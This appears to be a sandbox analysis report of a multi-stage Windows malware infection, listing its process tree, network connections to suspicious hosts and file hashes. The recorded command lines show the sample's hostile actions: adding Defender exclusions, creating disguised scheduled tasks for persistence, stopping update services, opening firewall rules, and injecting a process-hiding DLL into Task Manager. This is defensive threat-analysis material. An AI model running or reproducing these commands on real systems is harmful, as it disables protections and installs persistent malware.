C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3056 -ip 3056

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 540

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4977465.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c4977465.exe

C:\Users\Admin\AppData\Local\Temp\C01.exe

C:\Users\Admin\AppData\Local\Temp\C01.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Il6Jj0CT.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Il6Jj0CT.exe

C:\Users\Admin\AppData\Local\Temp\1ECF.exe

C:\Users\Admin\AppData\Local\Temp\1ECF.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nn9Ie4tJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nn9Ie4tJ.exe

C:\Users\Admin\AppData\Local\Temp\1FCA.bat

"C:\Users\Admin\AppData\Local\Temp\1FCA.bat"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3852 -ip 3852

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Bf8HN4LX.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Bf8HN4LX.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Sn1qc8gI.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Sn1qc8gI.exe

C:\Users\Admin\AppData\Local\Temp\23F1.exe

C:\Users\Admin\AppData\Local\Temp\23F1.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 404

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Nd72JG2.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Nd72JG2.exe

C:\Users\Admin\AppData\Local\Temp\2615.exe

C:\Users\Admin\AppData\Local\Temp\2615.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3976 -ip 3976

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\2923.exe

C:\Users\Admin\AppData\Local\Temp\2923.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3976 -s 388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 388 -p 3368 -ip 3368

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3308 -ip 3308

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3368 -s 576

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3308 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2YI081ao.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2YI081ao.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\243C.tmp\244D.tmp\244E.bat C:\Users\Admin\AppData\Local\Temp\1FCA.bat"

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Users\Admin\AppData\Local\Temp\4C3D.exe

C:\Users\Admin\AppData\Local\Temp\4C3D.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\959B.exe

C:\Users\Admin\AppData\Local\Temp\959B.exe

C:\Users\Admin\AppData\Local\Temp\98B9.exe

C:\Users\Admin\AppData\Local\Temp\98B9.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa5da346f8,0x7ffa5da34708,0x7ffa5da34718

C:\Users\Admin\AppData\Local\Temp\9A6F.exe

C:\Users\Admin\AppData\Local\Temp\9A6F.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa5da346f8,0x7ffa5da34708,0x7ffa5da34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,3099775985591816448,3937921857755771116,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2880 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,3099775985591816448,3937921857755771116,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4160 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4764 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5808 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3360 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,7065150344491869749,18187195105373105586,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3360 /prefetch:8

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\system32\rundll32.exe

C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask

C:\Users\Admin\AppData\Roaming\ibjehdt

C:\Users\Admin\AppData\Roaming\ibjehdt

C:\Users\Admin\AppData\Roaming\ubjehdt

C:\Users\Admin\AppData\Roaming\ubjehdt

C:\Users\Admin\AppData\Roaming\ibjehdt

C:\Users\Admin\AppData\Roaming\ibjehdt

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 209.78.101.95.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 195.233.44.23.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 9.57.101.20.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
RU 5.42.92.211:80 5.42.92.211 tcp
US 8.8.8.8:53 211.92.42.5.in-addr.arpa udp
US 52.111.227.13:443 tcp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
MD 176.123.9.142:37637 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 142.9.123.176.in-addr.arpa udp
US 8.8.8.8:53 tak.soydet.top udp
NL 85.209.176.171:80 85.209.176.171 tcp
FI 95.217.246.182:8443 tak.soydet.top tcp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 accounts.google.com udp
NL 157.240.201.35:443 www.facebook.com tcp
NL 157.240.201.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 171.176.209.85.in-addr.arpa udp
US 8.8.8.8:53 182.246.217.95.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 27.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
US 8.8.8.8:53 host-host-file8.com udp
NL 194.169.175.127:80 host-host-file8.com tcp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 35.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 162.61.21.104.in-addr.arpa udp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 104.21.61.162:80 bytecloudasa.website tcp
US 8.8.8.8:53 2dad9102-511b-412f-9be5-4a80823c29e3.uuid.cdntokiog.studio udp
US 8.8.8.8:53 server16.cdntokiog.studio udp
US 8.8.8.8:53 stun.ipfire.org udp
US 8.8.8.8:53 cdn.discordapp.com udp
BG 185.82.216.49:443 server16.cdntokiog.studio tcp
US 8.8.8.8:53 walkinglate.com udp
US 188.114.96.0:443 walkinglate.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe

MD5 9b353fd7c66b73794aa16a6fe111712c
SHA1 4342b6a1f9d734d1d65811802d5631978af5eb7a
SHA256 9df1fadc5619911ae5727915284a269cdb9a40fb36f4d2b2de801346b783cb3f
SHA512 ae0c582750a434054d2816f8f394c589f140cce8401c5cd0e560f584bde1096a43c289aa80ba8235e8ddacf51fe7738d4373384f9b8f5a1ac5308cb024ca9665

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v0366672.exe

MD5 9b353fd7c66b73794aa16a6fe111712c
SHA1 4342b6a1f9d734d1d65811802d5631978af5eb7a
SHA256 9df1fadc5619911ae5727915284a269cdb9a40fb36f4d2b2de801346b783cb3f
SHA512 ae0c582750a434054d2816f8f394c589f140cce8401c5cd0e560f584bde1096a43c289aa80ba8235e8ddacf51fe7738d4373384f9b8f5a1ac5308cb024ca9665

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe

MD5 d334cdf3fab091d2fd1245f000874e6a
SHA1 3cfcb8dc62848716a01672b97560ad7eece80143
SHA256 f20db299a4c88ad396ae6b9a343d687b0104857c136482de885c55ed5c95932d
SHA512 ec1724be301cb6932130c064429ea976e1cc69f571c6505df201ee7d705d5f5e98c5a2cd3f00e4c5e98bb5511021defd5ba263b5293e53a2b798ca245b6d3586

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a8177164.exe

MD5 d334cdf3fab091d2fd1245f000874e6a
SHA1 3cfcb8dc62848716a01672b97560ad7eece80143
SHA256 f20db299a4c88ad396ae6b9a343d687b0104857c136482de885c55ed5c95932d
SHA512 ec1724be301cb6932130c064429ea976e1cc69f571c6505df201ee7d705d5f5e98c5a2cd3f00e4c5e98bb5511021defd5ba263b5293e53a2b798ca245b6d3586

memory/864-15-0x0000000000400000-0x0000000000409000-memory.dmp

memory/864-14-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b6962543.exe

MD5 0e64b12cab703a7fa70a265fc49d367b
SHA1 396314b33a808b6e6410ff3c2d9dfa6db313d002
SHA256 869b352a4b2dcdc66600684053ccfeb2d3be13a7d3ce2834d5584cad7a015162
